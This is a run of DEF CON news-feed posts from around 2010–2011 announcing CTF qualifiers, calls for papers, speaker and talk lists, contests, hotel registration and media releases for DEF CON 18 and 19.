https://www.defcon.org/defconrss.xml You only have a few scant hours left (00:00:00 UTC) to register for the DEF CON 19 CTF Quals, which begin tomorrow at 19:00:00 UTC. This is the event that separates the hackers from the kiddies, to send the top 12 teams to battle for the glory that comes with winning a DEF CON Capture the Flag Competition. Register and get all the info at http://ddtek.biz!

==> New Contests and Events!

https://www.defcon.org/defconrss.xml Check out a few of the new contests and events coming to DEF CON 19! DEF CON Beard & Moustache Championships Due to the growing number of awesome beards at DEFCON and the (popularity?) of the shitshow that is beardsmanship, it's time that folks were recognized for letting their unix beards fly. DEF CON Radio Defcon Radio will be streaming live radio action 24/7 during the con. Speaker interviews, news, party coverage...correspondants will crawl the trenches of con to bring you entertainment. Are you not entertained? DEF CON Bike Rent bicycles, hire a guide, and endure a 2 Hour bike ride in the Las Vegas heat! Got Water? Forensics Contest The Network Forensics Puzzle Contest is a challenging mystery requiring contestants to forensically analyze packet captures (and more!) to uncover an evil plot.

==> DEF CON 19 Artwork Contest and Short Story Contest is Open!

https://www.defcon.org/defconrss.xml The DEF CON Artwork Contest is again underway! This year's theme is reminiscent of those 60's and 70's spy movies and TV shows like "The Man from U.N.C.L.E", "Our Man Flint", and "James Bond", with a hacker angle and a little grit. We have dubbed this theme "Haxploitation". (Read on...) For the writers, the DEF CON 19 Short Story contest is also open, and similar themed. Find out about it at https://forum.defcon.org/showthread.php?t=12153

==> Time Grows Short.

https://www.defcon.org/defconrss.xml Hola friends! This is just a reminder that deadlines are looming. The Call for Papers ends May 27th, so if you're planning to submit a talk you have just over a week to put that proposal together! Find the CFP Announcement at https://www.defcon.org/html/defcon-19/dc-19-cfp.html, and the Call for Papers form at https://www.defcon.org/html/defcon-19/dc-19-cfp-form.html. Also looming is the deadline for the DEF CON 19 Contest/Event RFI. June 1st is when you need to have your proposal for the latest great or time tested contest or event submitted to Pyr0. You can find the RFI at https://forum.defcon.org/showthread.php?t=12113. Good luck and remember: DEF CON is what you make it.

==> New DEF CON 19 Site, Speakers Up.

https://www.defcon.org/defconrss.xml Check out the spankin new site for DEF CON 19! Have a look around, see what's new, and while you're at it, check out the first batch of Speakers! Deceptive Hacking: How Misdirection Can Be Used Steal Information Without Being Detected Bruce "Grymoire" Barnett Abusing HTML5 Ming Chow Mamma Don't Let Your Babies Grow Up to be Pen Testers - (a.k.a. Everything Your Guidance Counselor Forgot to Tell You About Pen Testing) Dr. Patrick Engebretson and Dr. Josh Pauli Getting F*cked On the River Gus Fritschie and Mike Wright Jugaad – Linux Thread Injection Kit Aseem "@" Jakhar Black Ops of TCP/IP 2011 Dan Kaminsky Hacking Your Victims Over Power Lines Dave Kennedy (ReL1K) DCFluX in: License to Transmit Matt Krick "DCFluX" Balancing The Pwn Trade Deficit – APT Secrets in Asia Anthony Lai, Jeremy Chiu and PK Covert Post-Exploitation Forensics With Metasploit Wesley McGrew VoIP Hopping the Hotel: Attacking the Crown Jewels through VoIP Jason Ostrom Getting SSLizzard Nicholas J. Percoco and Paul Kehrer This is REALLY not the droid you're looking for... Nicholas J. Percoco and Sean Schulte WTF Happened to the Constitution?! The Right to Privacy in the Digital Age Michael "theprez98" Schearer Runtime Process Insemination Shawn Webb Staying Connected during a Revolution or Disaster Thomas Wilhelm Network Application Firewalls vs. Contemporary Threats Brad Woodberg As always, stay tuned to our Twitter, RSS Feed, or Facebook page for all the news as it happens!

==> DEF CON 19 Contest/Event RFI is Live!

https://www.defcon.org/defconrss.xml PyrØ Has posted the DEF CON 19 Contest & Event Request for Information on the DEF CON Forums. If you have, or are currently thinking about running a contest or an event at DEF CON, this is the info you need to be considered for space, power and network connectivity! Submit your contest data by filling out the form at the bottom. Here's a big shout out to Deviant Ollam for being on top of things and being the first to submit an RFI for the Beverage Cooling Contraption Contest!

==> DEF CON 19 Call for Music!

https://www.defcon.org/defconrss.xml Are you a Band or a DJ who wants to perform at DEF CON 19? Then answer the Call for Music freshly posted by DJ Great Scott! You can check out the write-up at https://forum.defcon.org/showthread.php?p=119223 as well as download the application! Hurry up and apply, as the Deadline is Sunday May 15! Good luck!

==> DEF CON 19 Call for Workshops!

https://www.defcon.org/defconrss.xml Are you a leader, 'leet hacker, a ninja in your field? Do you have a passion to teach and share your knowledge? Got something interesting you are dying to talk about? We're looking for workshops from people like you. If you are interested in being part of the very first ever DEF CON Workshop team, submit now! (Read on...)

==> DEF CON 19 News! Pool Hijinks, CTF Quals, and Evidence Tampering

https://www.defcon.org/defconrss.xml Here's what's going on in the world of DEF CON: The Pool Is Open! Bring your suits and stow your tech, because poolside shenanigans in the wee hours are coming back to DEF CON! This year we will have 24hr pool access to Pool 4 (pictured) at the Rio! We're not even April foolin! DDTek Announces CTF Quals! It's that time again, and your first step to joining the ranks of leetness that can only come from a win in the DEF CON Capture The Flag. That's right, DDTek has announced the qualification round for the 2011 DEF CON CTF! Tamper Evident Returns! DT's Tamper Evident Contest is coming back this year with some new surprises. It might be time to brush up on your super sneaky methods for opening things you aren't supposed to, and keep your eye on the Tamper Evident Forum for details as they surface. Stay tuned to our Twitter, RSS Feed, or Facebook page for all the news as it happens!

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml Feast your eyes on a new Speaker's Corner by Jack Daniel, which gives you some great tips if you are thinking about submitting a talk for DEF CON!

==> DEF CON 18 Video+Slides returns!

https://www.defcon.org/defconrss.xml We have re-loaded the original videos we posted from DEF CON 18 featuring video of the speaker and video of the slides! Check out the Video RSS Feed or on iTunes and enjoy!

==> The DEF CON 19 Call for Papers is Now Open!

https://www.defcon.org/defconrss.xml More exciting than HBGary's email, world's #1 hacker expose or 5up3r $3kret.gov leak, it is time for the DEF CON Call for Papers to open! What: DEF CON 19 Call For Papers When: The Call for Papers will close on May 27th, 2011 How: Complete the Call for Papers Form and send to talks at defcon dot org DEF CON will take place at the Rio in Las Vegas, NV, USA, August 4 - August 7th, 2011. Read the full announcement at https://www.defcon.org/html/defcon-19/dc-19-cfp.html

==> Contests and Events we'll see at DEF CON 19!

https://www.defcon.org/defconrss.xml Below you'll find a list of some of the fantastic contests and events that have announced intent to return for DEF CON 19! This is not by any means a complete list, and will be growing as planning continues. Artwork Contest(s): No Posts Be The Match Foundation - Bone Marrow Drive: Forum Active Beverage Cooling Contraption Contest: No Posts CTP: Capture the Packet: No Posts Crack Me If You Can: Forum Active Dark Tangent's Tamper Evident Contest: Forum Active DC101: Forum Active DEF CON Geo Challenge: No Posts DEF CON Shoot: Forum Active DEF CON Social Engineering CTF: No Posts Goon Band -- Recognize: No Posts Hacker Karaoke: No Posts Ham license exams: No Posts Lockpicking Contests: No Posts Open CTF: No Posts Scavenger Hunt: No Posts The Summit EFF Fundraiser: No Posts Toxic BBQ: No Posts Wall of Sheep: No Posts In case you didn't know, most of these contests and events started unofficially, with a great idea and some devotion, by attendees who just wanted to do something cool. Yes friend, that means you could be creating the next big DEF CON contest or event! Post your vision to the New Ideas section of the DEF CON Forums, and see what kind of response you get!

==> Rio Registration is Live for DEF CON 19!

https://www.defcon.org/defconrss.xml Here's something for all of you early birds! The DEF CON 19 group room registration at the Rio is now live! The room rates are $99 Sunday thru Thursday and $112 per night on Friday and Saturday. The group rates are valid Monday August 1 to Friday August 12. You may either follow this link: http://www.harrahs.com/CheckGroupAvailability.do?propCode=RLV&groupCode=SRDEF11 Or call the Rio toll free at 1-888-746-6955 and refer to group code: SRDEF11

==> DEF CON Groups News

https://www.defcon.org/defconrss.xml Happy 2011 from DEF CON! DEF CON Groups is undergoing some administrative changes heading into the new year, and we'd like to let you know that long time Goon and friend of DEF CON, Converge, has graciously stepped up to take the reins as DEF CON Groups Coordinator! If you currently run a DCG and want to update your info on the site, or if you are interested in starting a new DCG, you can contact him at dcgroups at defcon dot org. We'd like to extend a big welcome to the following new groups! DC334.1 Montgomery, AL DC808.2 Ewa Beach, HI DC9723 Tel-Aviv, Israel DC1020 Eckental, Germany DC281 Houston, TX Keep an eye open for more from the DEF CON Groups in 2011!

==> Stop. Think. Connect. A Special DHS, PSA Contest

https://www.defcon.org/defconrss.xml Howard Schmidt, Special Assistant to the President and Cyber Security Coordinator has issued a special PSA Contest. This crowd sourcing campaign is in an effort to alert the general public to Stop, Think, then connect, when it comes to their online presence and responsibility. Good, Bad, or otherwise, I would really like to see what the DEF CON community came up with. I am confident that our DEF CON community could come up with some pretty interesting feedback in regards to this contest, I'd love to see and hear the creative ways you would advertise to the general public. I can only imagine the hilarity that would ensure in a minute for a video entitled "How to not be a Noob" or "Phishing & Trolling, not what it was in Grandpa's day." Overall, I have had a love for PSA's since I was a kid. A lot of us remember and have a special place in our hearts for the PSA's of our youth, especially ones of the "The More you Know" variety. Who didn't like watching "This is your Brain on Drugs" or GI JOE telling us that bullying is wrong? I know I did, and "Knowing is Half the Battle". From the contest: "Keeping the Internet safe is a responsibility we all share. We need to take time to stop and think before we connect to the Internet, share information online, or participate in online communities. But sometimes, a creative and compelling reminder can help. That's why the Department has kicked-off the Stop. Think. Connect. PSA Challenge because all Americans have an important role to play in securing the Internet. We are looking for videos that will help educate Americans about Internet safety and what we can all do to protect ourselves and our families online. If you know what it takes to get Americans motivated to improve their safety online, then we need your help. We want videos that inspire Americans to Stop. Think. Connect." For details on the requirements and how to submit visit the contest page at: http://www.dhs.gov/files/events/stop-think-connect-psa-challenge.shtm PSAs must include at least one of the following Internet safety tips: * Keep a Clean Machine * Protect Your Personal Information * Connect with Care * Be Web Wise * Be A Good Online Citizen In similar fashion, I'd love to see if anyone out there posts something on: * Understanding Encryption * Surfing Anonymously * Using Proxy Servers or Feed Over Email * Understanding Copyright, TOS agreements, and Privacy expectations. * Who and What is a Troll and how to defeat them. This past year we had a few talks both in the offense and defense perspectives, check them out on the DC 18 archive, there are too many that fit this topic to list, you might find something that inspires you. I hope you guys & gals out there send in a submission, if you don't want to submit to the official contest, can you send us a link instead? These PSAs would be great to show at DEF CON 19, and if we can, we'd probably like to share some of your clips online so we can get the word out to "Stop. Think. Connect" The contest runs until Feb 14th, Valentines day, so send in your love, send us links, let's get this PSA party started. Good luck! Nikita @niki7a on twitter. Nikita@Defcon.org

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml Jack Daniel discusses PCI and the hacker community in a new Speaker's Corner entitled "How Did We End Up Like This?"

==> Video is Back!

https://www.defcon.org/defconrss.xml Video is back up and running! These versions differ from the ones we removed, they are video of the slides only with audio of the talk. You can find them on the Video RSS Feed or on the DEF CON 18 Archive Page!

==> Hacker Jeopardy Slides + Audio

https://www.defcon.org/defconrss.xml Here's a tasty morsel for you, slide video with audio of this year's Hacker Jeopardy! We don't often see this, so if you're interested in playing next year or just want to get an idea of what it's about, this is a great resource! DEF CON 18 Hacker Jeopardy - Friday Part 1 DEF CON 18 Hacker Jeopardy - Friday Part 2 DEF CON 18 Hacker Jeopardy - Saturday Part 1 DEF CON 18 Hacker Jeopardy - Saturday Part 2

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml Check out the new Speaker's Corner by the Suggmeister, the follow-up to his "Experiences of a First Time DEF CON Speaker" article before DEF CON 18!

==> Video Update

https://www.defcon.org/defconrss.xml The videos have been taken down for a week or two, as we worked a little too fast to get them up and the production company wasn't ready to release them. We will have slides+audio versions of the videos up and online within the next two weeks, once we receive the right versions and process. Thanks for your patience, and stay tuned to our Twitter, RSS Feed, or Facebook page for the announcement when they go back up!

==> DEF CON 18 Talks - Video is Live!

https://www.defcon.org/defconrss.xml DEF CON 18 talks with the speaker video and slides has been processed and posted! Check 'em out on the Video RSS Feed or on the DEF CON 18 Archive Page!

==> DEF CON 18 Talks - Audio is Live!

https://www.defcon.org/defconrss.xml That is correct folks! You can now listen to all of the awesome DEF CON 18 Talks in .m4b Audiobook format! You can find them on the Audio RSS Feed or on the DEF CON 18 Archive Page! Video is on the way, look for it soon! You can know about it the minute it goes live by keeping up with the DEF CON Facebook page or @_defcon_ on Twitter!

==> DEF CON 18 Tools Page Updated!

https://www.defcon.org/defconrss.xml Swing by the Tools Released page and have a look at all the tools released at DEF CON 18! There are local copies, if available, for your convenience, and links to the project homepages as well!

==> DEF CON 18 Music is posted!

https://www.defcon.org/defconrss.xml That's right, you can now download the sets from The Cyberpunk Gala and the poolside action at https://www.defcon.org/podcast/defcon-18-music.rss! The Zombie Ball is having some technical difficulties but should be up soon as well! We will also have video of the music sets soon as well, so keep an eye peeled.

==> DC18 Contest Results and New Speaker's Corner!

https://www.defcon.org/defconrss.xml Check out the DEF CON 18 Contest results page for the results of the contests we have received so far! If you ran a contest and have results for us, send them in! We also have a new Speaker's Corner from Schuyler Towne, discussing his secret agenda for locksport! Music sets from the pools and the bleep at DEF CON 18 are being processed, look for it to be posted next week!

==> More DEF CON 18 Press!

https://www.defcon.org/defconrss.xml We've updated the press page with even more DEF CON 18 coverage! Most of the new stuff can be found in the "Other" Category, and in a new category called "Video Coverage" which contains recaps, badge hacks, goon hijinks and more! Check them out on the Press Page, or the DEF CON 18 Archive Page!

==> DEF CON 18 Press And Early Video!

https://www.defcon.org/defconrss.xml Hey everyone! The Press Page and the DC 18 Archive Page have been updated with a ton of stories covering DEF CON 18! Not only that, but we have uploaded the first early release video (slides w/ audio) of a few of the talks, including: DEFCON 18 Hacking Conference Presentation By Joe Grand and Dark Tangent - Welcome And Behind The Scenes Of The DEFCON Badge - Slides.m4v DEFCON 18 Hacking Conference Presentation By Barnaby Jack - Jackpotting Automated Teller Machines Redux - Slides.m4v DEFCON 18 Hacking Conference Presentation By David Maynor and Paul Judge - Searching For Malware - Slides.m4v DEFCON 18 Hacking Conference Presentation By Chris Paget - Practical Cellphone Spying - Slides.m4v DEFCON 18 Hacking Conference Presentation By Md Sohail Ahmad - WPA Too! - Slides.m4v Enjoy! The rest of the audio and video will be up in a couple of months, but for now, enjoy these tasty nuggets of DEF CON goodness!

==> DEF CON 18 Archive Page is Live!

https://www.defcon.org/defconrss.xml The DEF CON 18 Archive Page is up and running! Currently, we have all of the presentation slides, white papers and extras posted, as well as the DEF CON 18 Program in pdf format! Coming in the next week or so we'll have contest results, press, and even a few early release videos! So check it out and begin reliving the glory that was DEF CON 18!

==> DEF CON 18 Post Con Update

https://www.defcon.org/defconrss.xml DEF CON 18 was a resounding success! With more contests, events, attendance and talks, this year's show was a fitting end to our years at the Riviera! We'd like to thank the Riv for working with and hosting us for 5 awesome years! We'd also like to thank all the folks who sacrificed time, effort, and resources to contribute to the hacking community, as well as a huge thank you to all the attendees for showing up and learning, growing and participating in all this con has to offer! We've all had a chance to wind down decompress from all the excitement of DEF CON 18, and all of the results, press, photos, updated materials and other content is rollng in. Starting in the next couple of days and through the next few weeks, we'll be posting all of this info for everyone to enjoy, reflect upon, and learn from. Keep your eyes on defcon.org, the DEF CON RSS feed, our Twitter and Facebook for all the latest updates from the show!

==> PhD Dissertation Study in the Contest Area

https://www.defcon.org/defconrss.xml Take a short survey at the table next to the Info booth in the Contest Area to participate! Here's more info: The US electricity infrastructure relies on Industrial Control Systems (ICS) for better efficiency and reliability. However, these systems are susceptible to cyberattacks, which may disrupt essential power services. How cybercriminals rationalize target selection and attack technique is vital in offering a more comprehensive picture of ICS vulnerabilities, cybercrimes, and security. This Rutgers School of Criminal Justice PhD dissertation research project will survey both ethical hackers and industry representatives. It will assess their views on cybervulnerabilities of the electricity sectors ICS to identify any gaps in their perceptions.

==> New Speakers Corner!

https://www.defcon.org/defconrss.xml Craig Heffner discusses hacking millions of routers and his upcoming talk tomorrow in a new Speaker's Corner!

==> Be the Match at DEF CON

https://www.defcon.org/defconrss.xml Be The Match offers the unique opportunity for you to give a life-saving marrow transplant to someone in need. Thousands of patients with leukemia and other life-threatening diseases depend on the Be The Match Registry, the largest and most diverse registry in the worlds, to find a life-saving donor. The more potential donors that step forward, more resources are available to patients and more lives can be saved. <strong>Description of the donor recruitment drive:</strong> Be The Match will have a booth at DefCon 18 where individuals can register to be part of the Be The Match Registry. All they need to be is between the ages of 18 and 60, meet the health guidelines and be willing to donate to ANY patient in need. At the recruitment drive, you will fill out a consent form with contact information and a short medical evaluation. You will receive more information about what it means to be a donor and then you will swab the inside of your cheeks. Your tissue type will be listed in the Be The Match Registry until your 61st Birthday. If you are a match for someone in need, then you will be contacted for donation.

==> DEF CON 18 Secure Wifi

https://www.defcon.org/defconrss.xml This year we are offering 802.1x/WPA-encrypted wireless access for Internet access. In order to access the "DefCon-Secure" wireless network, you will need to create login information for yourself. We have setup a self-registration website. https://wifireg.defcon.org Go to this site to register a username & password. You can hit it from your phone, WWAN, or the open DefCon wireless. We have also included a copy of the SecureTrust CA root certificate in case your device does not have it in its default certificate trust chain (many systems do, some do not). SSID: DefCon-Secure or DefCon-SecureA for 5.0GHz devices (iPad, newer Macbooks) Network Authentication: WPA2 Data encryption: TKIP or AES Authentication EAP Type: PEAP Authentication Mechanism: EAP-MSCHAP v2

==> More New Speaker's Corner!

https://www.defcon.org/defconrss.xml The Suggmeister provides some insight into the genesis of a talk as a new speaker in this new Speaker's Corner!

==> New Speaker's Corner

https://www.defcon.org/defconrss.xml Matt Ryanczak Talks about IPv6 and the future in this all new Speaker's Corner!

==> Another New Speaker's Corner

https://www.defcon.org/defconrss.xml Tips for getting the most out of your DEF CON experience are discussed in this Speaker's Corner by Nicholas Percoco entitled "Packing It All In"!

==> New Speaker's Corner

https://www.defcon.org/defconrss.xml Lockpick shapes are de-mystified in this part one of a new Speaker's Corner by Schuyler Towne entitled "What's This Lockpick For?"!

==> The Heat is On!

https://www.defcon.org/defconrss.xml There's a ton happening leading up to DEF CON 18 in just twelve more days! The Mystery Challenge is heating up! Check out the Mystery Challenge forum for the latest hijinks! We have some bad news, unfortunately the Geo Challenge will not be happening this year. You can read more about this on the Geo Challenge forum. Our sympathy goes out to the organizers for what promised to be a great contest. Definitely look for it next year! There are some exciting new offerings that have surfaced recently! Among them are: Dark Tangent is busting out the Tamper Evident Contest, in which you debunk the phrase "Impossible to reseal or re-use", and document how you did it! The Backdoor Hiding Contest, in which you test your skills at hiding and finding backdoors. Capture the Packet is a cool new network scavenger hunt. Look for clues, solve puzzles and win prizes! Crack Me If You Can: 53,000 password hashes, 48 hours, nuff said! PCB PWNage is a mini contest from the Hardware Hacking Village to find out who can design the coolest PCB! The Twitter Hunt: Follow @TheSuggmeister and watch for the clues that lead to prizes! For all the latest info on contests and events at this year's DEF CON, check out the DEF CON Forums!

==> DEF CON 18 Artwork Contest Winners!

https://www.defcon.org/defconrss.xml Congratulations to the Winners of the DEF CON 18 Artwork Contest! We had a bunch of great entries this year, But we could only pick a few! First Place and People's Choice vote win goes to "18 & Legal" by Mar! Second place goes to "DEF CON Boy" by oshu! Third Goes to "Her" by emtag! Congrats to all the winners and a big thanks to all who entered! To view and download all the wallpapers from this year's contest got to the DEF CON 18 Artwork Contest Public Gallery!

==> Artist pages are live!

https://www.defcon.org/defconrss.xml You can now view all the bios and samples from the killer line-up of artists performing at DEF CON this year! Check them out on the Entertainment page.

==> DEF CON 18 Speaking Schedule is Live!

https://www.defcon.org/defconrss.xml Do we need to say much more than that? Check out the DEF CON 18 Speaking Schedule.

==> The DC 18 Speaker List Is Still Growing!

https://www.defcon.org/defconrss.xml Here's another twenty-four hot-n-fresh new DEF CON talks. Feast. Katana: Portable Multi-Boot Security Suite JP Dunning Exploitable Assumptions Workshop Joe "Crazy" Foley, Eric "Unlocked" Schmiedl, Zoz The Law of Laptop Search and Seizure Jennifer Granick, Kevin Bankston, Marcia Hofmann, Kurt Opsahl Advanced Format String Attacks Paul Haas Tales from the Crypto G. Mark Hardy Decoding reCAPTCHA Chad Houck 0box Analyzer: AfterDark Runtime Forensics for Automated Malware Analysis and Clustering Wayne Huang, Jeremy Chiu Hardware Hacking for Software Guys Dave King These Aren't the Permissions You're Looking For Anthony Lineberry, Tim Wyatt, David Richardson, Sr. Multiplayer Metasploit: Tag-Team Penetration and Information Gathering Ryan Linn App Attack: Surviving the Mobile Application Explosion Kevin Mahaffey, John Hering Searching for Malware: A Review of Attackers Use of Search Engines to Lure Victims Dave Maynor, Dr. Paul Q. Judge Getting Social with the Smart Grid Justin Morehouse, Tony Flick Electronic Weaponry or How to Rule the World While Shopping at Radio Shack Timothy "Mage" Otto WiMAX Hacking 2010 Pierce, Goldy, aSmig Industrial Cyber Security Wade Polk, Paul Malkewicz, J.Novak Improving Antivirus Scanner Accuracy with Hypervisor Based Analysis Danny Quist Search & Seizure & Golfballs Jim Rennie, Eric Rachner pyREtic - In-memory Reverse Engineering for Obfuscated Python Bytecode Rich Smith Stratagem 1 - Deceiving the Heavens to Cross the Sea Jayson E. Street Breaking WPA-TKIP: Decrypting All Traffic Mathy Vanhoef Go Go Gadget Python! : Introduction to Hardware Hacking Nick Waite, Furkan Cayci The Night The Lights Went Out In Vegas: Demystifying Smartmeter Networks Barrett Weisshaar, Garret Picchioni Panels PCI, Compromising Controls and Compromising Security Jack Daniel, Joshua Corman, Dave Shackleford, Anton Chuvakin, Martin McKeay, Alex Hutton, James Arlen Meet the EFF Kurt Opsahl, Eva Galperin, Kevin Bankston, Jennifer Granick, Marcia Hofmann,

==> Voting is Officially Open for the DEF CON 18 Artwork Contest!

https://www.defcon.org/defconrss.xml Here's what you do: go to the DEFCON 17 Artwork Contest Gallery on pics.defcon.org and pick your favorite. Then head on over here and vote in the poll! Good Luck to all the fantastic entries!

==> That's Right.. We're Posting More DC 18 Speakers...

https://www.defcon.org/defconrss.xml Here's a new list of speaker adds You're probably not even finished absorbing the last one. That's just how we do. Deal with it. Mobile Privacy: Tor on the iPhone and Other Unusual Devices Marco Bonetti, sid77 Who Cares About IPv6? Sam Bowne masSEXploitation Michael Brooks Google Toolbar: The NARC Within Jeff Bryner WRT54-TM, Media Center and Network Sniffer John A. Colley IPv6: No Longer Optional John Curran Function Hooking for Mac OSX and Linux Joe Damato Breaking Bluetooth By Being Bored JP Dunning An Observatory for the SSLiverse Peter Eckersley, Jesse Burns How Unique Is Your Browser? Peter Eckersley Hacker Community (around) the Corporate World - Part II Luiz "effffn" Eduardo Be A Mentor! Marisa Fagen The Anatomy of Drug Testing Jimi Fiekert FOE The release of Feed Over Email, a Solution to Feed Controversial News to Censored Countries. Sho bleep Exploiting Digital Cameras Oren Isacson, Alfredo Ortega How I Met Your Girlfriend Samy Kamkar Bypassing Smart-card Authentication and Blocking Debiting: Vulnerabilities in Atmel Cryptomemory-based Stored-value Systems Jonathan Lee, Neil Pahl We Don't Need No Stinkin' Badges: Hacking Electronic Door Access Controllers Shawn Merdinger Letting the Air Out of Tire Pressure Monitoring Systems Mike Metzger Open Source Framework for Advanced Intrusion Detection Solutions Patrick Mullen, Ryan Pentney Antique Exploitation (aka Terminator 3: Point One One for Workgroups) Jon Oberheide Build Your Own Security Operations Center for Little or No Money Josh Pyorre Operating System Fingerprinting for Virtual Machines Nguyen Anh Quynh Lord of the Bing: Taking Back Search Engine Hacking from Google and Bing Rob Ragan. Francis Brown Social Networking Special Ops: Extending Data Visualization Tools for Faster Pwnage The Suggmeister Getting Root: Remote Viewing, Non-local Consciousness, Big Picture Hacking, and Knowing Who You Are Richard Thieme INSECURITY ENGINEERING OF PHYSICAL SECURITY SYSTEMS: Locks, Lies, and Videotape Marc Weber Tobias, Tobias Bluzmanis, Matt Fiddler Build your own UAV 2.0 - Wireless Mayhem from the Heavens! Michael Weigand, Renderman, Mike Kershaw Crawling BitTorrent DHTs for Fun and Profit Scott Wolchok

==> More Speakers Added to the DEF CON website!

https://www.defcon.org/defconrss.xml DC 18 is getting close and we've added another batch of speakers. Keep tabs on the DEF CON 18 speakers page as we finalize the list. WPA Too! Md Sohail Ahmad Evilgrade, "You Still Have Pending Upgrades?" Francisco Amato Exploitation on ARM - Technique and Bypassing Defense Mechanism Itzhak "Zuk" Avraham Resilient Botnet Command and Control with Tor Dennis Brown Open Public Sensors and Trend Monitoring Daniel Burroughs Bad Memories Elie Burzstein, Baptiste Gourdin, Gustav Rydstedt Kartograph : Finding a Needle in a Haystack or How to Apply Reverse Engineering Techniques to Cheat at Video Games. Elie Burzstein, Jocelyn Lagarenne, Dan Boneh Token Kidnapping's Revenge Cesar Cerrudo Hacking Facebook Privacy Chris Conley Physical Security : You're Doing It Wrong! A.P. Delchi Hacking with Hardware: Introducing the Universal RF Usb Keboard Emulation Device - URFUKED Monta Elkins Trolling Reverse-Engineers with Math: Ness... It hurts... frank^2 Mastering the Nmap Scripting Engine Fyodor, David Fifield Live Fire Exercise: Baltic Cyber Shield 2010 Kenneth Geers Making the DEFCON 18 Badge Joe "Kingpin" Grand Legal Developments in Hardware Hacking Jennifer Granick. Matt Zimmerman How To Get Your FBI File (and Other Information You Want From the Federal Government) Marcia Hoffman The Chinese Cyber Army - An Archaeological Study from 2001 to 201 Wayne Huang, Jack Yu Ripping Media Off Of the Wire HONEY Malware Migrating to Gaming Consoles: Embedded Devices, an AntiVirus-free Safe Hideout for Malware Ahn Ki-Chan, Ha Dong-Joo Training the Next Generation of Hardware Hackers -- Teaching Computer Organization and Assembly Language Hands-on with Embedded Systems Andrew Kongs, Dr. Gerald Kane ChaosVPN for playing CTFs mc.fly, vyrus, ryd FPGA Bitstream Reverse Engineering Lang Nguyen Kim Jong-il and Me: How to Build a Cyber Army to Defeat the U.S. Charlie Miller Big Brother on the Big Screen: Fact/Fiction? Nicole Ozer, Kevin Bankston Practical Cellphone Spying Chris Paget Extreme-range RFID Tracking Chris Paget My Life As A Spyware Developer Garry Pejski Implementing IPv6 at ARIN Matt Ryanczak Exploiting WebSphere Application Server's JSP Engine Ed Schaller Gaming in the Glass Safe - Games, DRM & Privacy Ferdinand Schober You're Stealing It Wrong! 30 Years of Inter-Pirate Battles Jason Scott Browser Based Defenses James Shewmaker Drivesploit: Circumventing Both Automated AND Manual Drive-by-Download Detection Caleb Sima, Wayne Huang Your ISP and the Government: Best Friends Forever. Christopher Soghoian Weaponizing Lady GaGa, Psychosonic Attacks Brad Smith From "No Way" to 0-day: Weaponizing the Unweaponizable Joshua Wise Pwned By The Owner: What Happens When You Steal A Hacker's Computer Zoz

==> DEF CON 18 Contest Madness!

https://www.defcon.org/defconrss.xml Over the past week or two, we've had a flood of announcements for new contests! Check them out below! Dark Tangent's Tamper Evident Contest There are various tamper evident technologies out there, including tape, seals, locks, tags, and bags, to name a few. This contest will test your ability to perform "defeats" (Described below) against a range of inexpensive commercial low to medium security products. Backdoor Hiding Contest Two in one Backdoor Hiding/Finding Contest (participate in either or both): In the first stage, hiding participants provide a source code hiding a backdoor, in the second stage organizers mix the source codes with non-backdoored (placebos), and then ask finding participants to spot the placebos. Hiding participants get hiding points for being voted as a placebo and finding participants get points for spotting the placebos and negative points for false positives. KoreLogic's "Crack Me If You Can" Contest As a part of an authorized penetration test of a large corporate network, you have captured a large number of passwords hashes. The hashes are from Active Directory, UNIX systems, LDAP servers, routers, etc. As part of your analysis, your client has asked for password complexity statistics, what their users are doing right and/or wrong related to generating passwords, and identification of weak passwords. You only have 48 hours to complete this effort.

==> CTF Quals Official Results!

https://www.defcon.org/defconrss.xml Congratulations to the qualifying teams for DEF CON Capture the Flag 2010! Official Quals info is live on ddtek.biz, so check it out for standings, correct and submitted answers by team and much more! Qualified teams: 1. VedaGodz (CONFIRMED!) 2. European Nopsled Team (CONFIRMED!) 3. TwoSixNine (CONFIRMED!) X. Uberminers (deadline expired) 4. lollersk8erz (CONFIRMED!) 5. GoN (CONFIRMED!) 6. painsec (CONFIRMED!) 7. ACME Pharm (CONFIRMED!) 8. Routards (CONFIRMED!) X. Nibbles (CAN'T PARTICIPATE) 9. shellphish (CONFIRMED!) 10. teambfe (CONFIRMED!) alt. Plaid Parliament of Pwning (CONFIRMED!) X. int3pid pandas (CAN'T PARTICIPATE) alt. HackerDom (CONFIRMED!)

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml Check out the new Speaker's Corner by Shawn Moyer entitled "Kill Yr Idols"!

==> CFP Closes, More Talks Posted!

https://www.defcon.org/defconrss.xml Here's another great batch of talks for DEF CON 18! Stay tuned, we got tons of last minute submissions, so there's a bunch more more coming down the pipe in the next couple of weeks! Internet Wars Panel More info to come. Cyber[Crime|War] Charting Dangerous Waters Iftach Ian Amit Seccubus - Analyzing Vulnerability Assessment Data the Easy Way... Frank Breedijk Exploiting SCADA Systems Jeremy Brown Katana: Portable Multi-Boot Security Suite JP Dunning Making the DEF CON 18 Badge. Joe "Kingpin" Grand How to Hack Millions of Routers Craig Heffner Powershell...omfg David Kennedy (ReL1K) and Josh Kelley (Winfang) Like a Boss: Attacking JBoss Tyler Krpata Blitzableiter - the Release Felix "FX" Lindner Changing Threats To Privacy: From TIA To Google Moxie Marlinspike Attacking .NET Programs at Runtime Jon McCoy Securing MMOs: A Security Professional's View From the Inside metr0 Wardriving the Smart Grid: Practical Approaches to Attacking Utility Packet Radios Shawn Moyer and Nathan Keltner The Games We Play Brandon Nesbit ExploitSpotting: Locating Vulnerabilities Out of Vendor Patches Automatically Jeongwook Oh Sniper Forensics - One Shot, One Kill Christopher E. Pogue A.K.A "Big Poppa ReverShell" Toolsmithing an IDA Bridge, Case Study For Building a Reverse Engineering Tool Adam Pridgen A New Approach to Forensic Methodology - !!BUSTED!! Case Studies David C. Smith and Samuel Petreski Web Application Fingerprinting with Static Files Patrick Thomas VirGraff101: An Introduction to Virtual Graffiti Tottenkoph An Examination of the Adequacy of the Laws Related to Cyber Warfare Dondi "SpookDoctor06" West

==> Reg Open For Social Engineering Contest!

https://www.defcon.org/defconrss.xml The folks at social-engineer.org have taken the reigns of the DEF CON 18 Social Engineering Contest, and Registration is Open! This promises to be an exciting addition to this year's DEF CON, and has some pretty cool prizes, including an iPad and a spot on the Social Engineer Podcast for 1st place. Check out the contest description and official rules at http://www.social-engineer.org/blog/defcon-social-engineering-contest/.

